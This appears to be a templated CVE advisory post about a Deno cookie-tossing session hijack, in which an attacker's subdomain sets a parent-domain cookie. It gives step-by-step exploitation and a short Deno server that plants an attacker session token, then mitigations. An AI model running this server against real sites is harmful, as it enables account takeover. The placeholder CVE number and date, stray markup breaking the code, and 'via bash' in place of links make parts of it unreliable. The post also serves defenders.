Deno, Session Hijacking, CVE-2023-XXXX (Critical)

By /

How the CVE Works:

This vulnerability arises when an attacker-controlled subdomain (e.g., evil.host.com) sets cookies scoped to the parent domain (.host.com). This allows the attacker to replace session tokens for applications hosted on sibling subdomains (e.g., community.host.com) if session tokens are not rotated after authentication. The attacker can hijack a victim’s session by forcing the victim to visit the malicious subdomain, where the attacker’s server sets a cookie for the parent domain. This cookie overrides the victim’s session token, granting the attacker access to the victim’s authenticated session on sibling subdomains. The vulnerability is exploitable only if the parent domain is not on the Public Suffix List (PSL) and the attacker controls a direct child subdomain.

DailyCVE Form:

Platform: Deno
Version: All versions
Vulnerability: Session Hijacking
Severity: Critical
Date: 2023-10-XX

What Undercode Say:

Exploitation:

  1. Attacker Setup: Host a server on a controlled subdomain (e.g., evil.host.com).
  2. Harvest Session Token: Attacker visits `community.host.com` to obtain a session token.
  3. Victim Interaction: Victim clicks a link to `https://evil.host.com`.
  4. Cookie Override: Server sets a cookie with `Domain=.host.com` using the harvested token.
  5. Session Hijacking: Victim’s requests to `community.host.com` now use the attacker’s token.

    Commands and Code:

– Exploit Server (Deno):

Deno.serve({
port: 8000,
hostname: 'evil.host.com',
onListen: (o) => console.log(<code>Server started at http://${o.hostname}:${o.port}`),
},
async (req) => (new Response(</code>Session hijacked!`,
{
status: 200,
headers: {
'set-cookie': 'session_cookie=attacker_token; Domain=.host.com; Secure; HttpOnly',
}
}
))
);

– Verify Cookie Setting:

curl -I http://evil.host.com

Protection:

1. Session Token Rotation:

// After authentication:
invalidateOldSession();
const newToken = generateToken();

2. Cookie Scoping:

// Restrict cookies to explicit subdomain:
"Set-Cookie": "session=token; Domain=community.host.com; Secure; HttpOnly; SameSite=Lax";

3. Public Suffix List Registration:

  • Submit `host.com` to the Public Suffix List via bash.

4. Browser Security:

  • Ensure cookies are only set for domains the server is authoritative for (RFC 6265 §5.3).
  • Validate domains against the Public Suffix List.

Analytics:

  • Impact: Account takeover, data exposure, and unauthorized access.
  • Prerequisites:
  • Attacker controls a direct child subdomain (e.g., evil.host.com).
  • Parent domain is not PSL-listed.
  • Session tokens persist post-authentication.

References:

  • RFC 6265 §5.3: Cookie Domain Validation.
  • Public Suffix List: bash.
    By following these steps, developers can mitigate the risk of session hijacking and protect their applications from this critical vulnerability.

References:

Reported By: https://github.com/advisories/GHSA-hg9j-64wp-m9px
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top